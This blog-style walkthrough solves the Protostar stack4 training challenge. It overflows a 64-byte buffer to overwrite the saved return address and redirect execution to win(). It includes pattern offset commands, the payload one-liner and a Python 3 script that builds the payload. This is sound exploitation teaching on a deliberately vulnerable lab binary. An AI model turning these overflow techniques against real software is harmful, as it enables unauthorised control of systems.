Hey again, today's article is going to be short. Last time I solved stack3; today I'm going to solve stack4, which is really interesting. It is only slightly different from stack3, but that difference is something new compared to the previous challenges. So let's not talk too much and jump right in.
Read my other articles about buffer overflow
Let’s take a look at the source code first :
Very simple! It defines the win function, then defines the main function, which sets up a buffer of 64 chars and stores our input in it. But wait a second, where is the variable that we're going to overwrite? In the previous challenges we had a variable that was used by a function to change the code flow; now what will we overwrite?
The answer is EIP, the instruction pointer, which holds the address of the next instruction the program will execute. What we actually overwrite is the saved return address on the stack; when main returns, that value is loaded into EIP, so the program executes whatever that address refers to. Let's try to exceed the buffer.
python -c "print 'A' * 64"
The program didn't even crash. Why? Because the return address is not directly after the buffer like in the previous challenges. Let's try 100 chars.
python -c "print 'A' * 100"
The program crashed. Let's find where exactly it crashes, like we did in the previous challenge (read it if you haven't done so yet).
We will create a 100-byte pattern with:
./pattern_create.rb -l 100
Then we pass it to the program in gdb.
It crashes with EIP = 0x63413563, which is the four pattern bytes that ended up in the return address.
We locate that value with pattern_offset:
./pattern_offset.rb -q 63413563
We get an exact match at offset 76. That is 12 bytes past the end of the 64-byte buffer: the gap is the saved frame pointer plus the padding the compiler placed between the buffer and the return address.
Next step is to find the address of the win function, since that is where we want the return address to point.
The address is 0x080483f4, which the exploit writes as \xf4\x83\x04\x08 because x86 stores addresses little-endian.
Now we can build our exploit:
python -c "print 'A' * 76 + '\xf4\x83\x04\x08'" | ./stack4
And we successfully changed the code flow: main returns into win instead of its normal caller.
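As an added example (not part of the original post), here is the pattern, offset and payload arithmetic above written in Python 3, so the numbers can be checked without gdb. The EIP value 0x63413563, the offset 76 and the win address 0x080483f4 are the ones from this walkthrough; the pattern generator mirrors the Metasploit Aa0Aa1... scheme.

```python
import struct
import sys


def cyclic_pattern(length):
    """Metasploit-style pattern: Aa0Aa1...Aa9Ab0... (upper, lower, digit triples).

    Every 4-byte window is unique, so the bytes that land in EIP identify
    their offset within the pattern.
    """
    out = []
    for upper in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in "abcdefghijklmnopqrstuvwxyz":
            for digit in "0123456789":
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip_value):
    """Return the offset of the 4 pattern bytes that were loaded into EIP.

    EIP is read as a little-endian 32-bit integer, so packing it back with
    '<I' recovers the bytes in the order they sat in memory (0x63413563 -> 'c5Ac').
    Returns -1 when the value is not part of the pattern.
    """
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern.find(needle)


def build_payload(offset, target):
    """Padding up to the saved return address, then the target little-endian."""
    return b"A" * offset + struct.pack("<I", target)


if __name__ == "__main__":
    # Values from this walkthrough: crash EIP, then the address of win().
    off = pattern_offset(cyclic_pattern(100), 0x63413563)   # 76
    sys.stdout.buffer.write(build_payload(off, 0x080483F4))  # pipe into ./stack4
```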
Previous Binary Exploitation article : Buffer Overflow Examples, Overwriting a function pointer - protostar stack3
Next Binary Exploitation article : Buffer Overflow Examples, Code execution by shellcode injection - protostar stack5